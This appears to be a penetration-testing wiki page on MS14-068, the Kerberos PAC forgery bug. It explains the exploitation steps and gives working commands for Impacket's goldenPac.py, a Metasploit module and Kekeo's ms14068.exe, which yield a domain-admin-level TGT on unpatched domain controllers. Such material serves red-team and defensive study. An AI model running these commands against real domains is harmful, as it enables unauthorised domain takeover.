## Theory
This vulnerability allows attackers to forge a TGT with high privileges (i.e. with a modified PAC stating the user is a member of privileged groups). This attack is similar to the Golden ticket, however, it doesn't require the attacker to know the krbtgt. This attack is a really powerful privilege escalation technique, however, it relies on a 2014 bug and will not work on patched domain controllers.

The exploitation goes as follow:

- A PAC-less TGT is obtained via an AS-REQ with the `PA-PAC-REQUEST` attribute set to false. This will be used in a later step.
- A PAC indicating an account membership to powerful groups in the domain is forged and "signed" with MD5 (or any other non-keyed algorithm listed here).
- A TGS-REQ message, requesting a service ticket targeting the KRBTGT service (i.e. a TGT-like) is sent to the vulnerable KDC, using the forged PAC from step (2) encrypted with a sub-session key (usually the session key) and included in the TGT from step (1).
- In response to step (3), a new TGT containing the forged PAC will be received from the vulnerable KDC after its validation of the forged PAC (the vulnerability happens here).

The newly obtained TGT can be use like a golden ticket, with pass-the-ticket, to perform privileged various actions.

## Exploit
=== "UNIX-like"
    **Impacket (goldenPac.py)**

    The attack can be carried out automatically using Impacket's goldenPac.py (Python). This tool conducts the attack and tries to open a privileged session using the obtained TGT and PsExec. The TGT can be stored locally with the -w path parameter.
    ```bash
    goldenPac.py "$DOMAIN_FQDN"/"$USER":"$PASSWORD"@"$DC_HOST" -dc-ip "$DC_IP"
    ```

    **Metasploit Framework**

    The Metasploit Framework can also be useful in the sense that it prints valuable error information.
    ```bash
    msf6 > use admin/kerberos/ms14_068_kerberos_checksum
    ```
=== "Windows"
    **Kekeo**

    Prerequisite : Build ms14068.exe following [kekeo's documentation](https://github.com/gentilkiwi/kekeo#readme).
    ```bash
    # NB : ms14068.exe can act in two ways
    # /ticket : Write the obtained ticket on disk with default name tgt.kirbi
    # /ptt : Pass-the-ticket by directly injecting the obtained TGT into LSA

    # with password
    # domain SID and user RID are automaticaly discovered
    ms14068.exe /domain:$domain /user:$user /password:$password /kdc:$VULN_KDC_FQDN

    # with an NT hash
    # AES-128 and AES-256 keys are also usable with /aes128 and /aes256 respectively
    # note that automatic discovery of the user SID is not possible when using hash 
    ms14068.exe /domain:$domain /user:$user /key:$krbtgt_NThash /sid:$DomainSID /rid:$userRelativeID /kdc:$KDC_FQDN
    ```
